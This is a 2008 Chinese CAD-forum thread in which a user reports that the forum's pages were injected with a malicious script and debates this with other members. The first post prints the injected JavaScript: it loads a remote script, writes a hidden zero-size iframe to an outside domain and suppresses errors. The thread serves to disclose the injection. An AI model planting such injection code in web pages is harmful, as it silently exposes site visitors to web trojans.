QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

查看: 2116|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
    1 L0 J, W0 H+ A7 c- r2 a  K
  2. 1 U( B% n+ z& [: O4 @
  3. document.writeln("<script>";
    " h0 R& e: \  x( N
  4. document.writeln("function oK_Begin(){";
    ) A! x; ~1 s& r2 \4 D7 K
  5. document.writeln("var Then = new Date() ";5 ^% j2 f% p/ I& M( }' z
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
    ) P' g0 X% G  w0 ?) g
  7. document.writeln("var cookieString = new String(document.cookie)";6 h; h! D& Z% B% o; M! ~
  8. document.writeln("var cookieHeader = "Cookie1=" ";
    6 A3 L' ~' ~2 A9 l! t) ~
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";) x% Z, y0 p' M# k, Q2 x
  10. document.writeln("if (beginPosition != -1){ ";
    - `6 b1 o. I6 I) N, t' f5 L' u
  11. document.writeln("} else ";. G' Q* P( H# e! ^- T- }
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";9 m1 ^0 m- @/ [& E% U- C
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";) n" f. s3 p: ^
  14. document.writeln("}";
    8 n; l6 N7 O) J& B9 D
  15. document.writeln("}";
    2 b& P. H  M8 m$ d) r* P  W, \
  16. document.writeln("oK_Begin();";" M: ~' d0 t- _4 c6 C, G1 a
  17. document.writeln("<\/script>";
    7 _" S% j" {5 O; m0 B# y9 Y
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"5 u9 p. u5 P2 h) [

  19. ( g6 k2 p+ f6 f$ [: H
  20. . K2 [2 Y/ N. G6 E3 S' L

  21. ) z6 F; ^! e: @3 z3 M6 v$ J

  22. 4 ~' F3 K; G: z+ v4 i) N
  23.   D, U$ R9 h- g+ f
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.
' t# V% ?5 i6 Q, |" N. }只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
1 y4 K2 V4 u, @* `) r1 _9 M不过,已经被清理了.
! x) g; B8 w# ?. a. D' i* r+ z$ S5 S* _" n1 l4 w) \
HEHE* B1 U7 E6 S+ c
% O9 g- _' _' W
[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?
# X, Z* M1 N# E, ?0 K6 g' d- C3 o; G' E7 x6 ^# Q6 ~
ht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js6 n" w; v2 ~6 D8 ?$ K4 c- ~
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.% i( {8 v5 X5 C: \. i6 b
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.0 |, c0 X) Y* }
HEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.0 s# U" u" |0 V5 ~9 ~
红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.
  y" f/ o0 z  L0 N5 E' U* h: DHEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:1 I9 t* K+ @; i! O
http://www.3dportal.cn/discuz/ 之原
) D8 @; e! Q/ m0 S似乎看不见楼主所说的 http://u.cruze3.cn/u.js8 r+ I# A. p. }& Y: o5 w
& }" T: F1 I0 M
[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!/ h4 J, ^7 x0 B) z9 B% F
) l6 J$ q# F7 u% _  R7 Y
请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
4 A5 h! s* c) R5 p我也说了:已修复。6 f3 b; |; q* a- l/ a  I7 `9 I, c2 I4 q6 {
# ?% r8 u# u+ N8 h0 y# b" R% n
ps:这与缓存毫无关系。虽然缓存中有U.JS.
  s9 F8 j) u/ W7 H4 e但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
5 G, o' `0 M/ P& y" O
8 S9 X0 x6 |! M% }, v9 dscript是个JAVA代码,与U盘何关?
5 j! s( U0 A$ h  S' U' y. |& F5 k! p& j% P3 C
HEHE5 @8 `, {) I7 V9 ?; N8 x8 i
. y, F& F* |( o! q
[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!
; {+ `- A5 b" s2 {+ t; ]
3 m* @* N. a. U' F8 [5 L6 }& t9 N如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。
0 B$ r6 z& w% _$ y1 U0 Y  d% p8 b( M0 q- {0 E4 y5 \% q1 Q, ?
相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表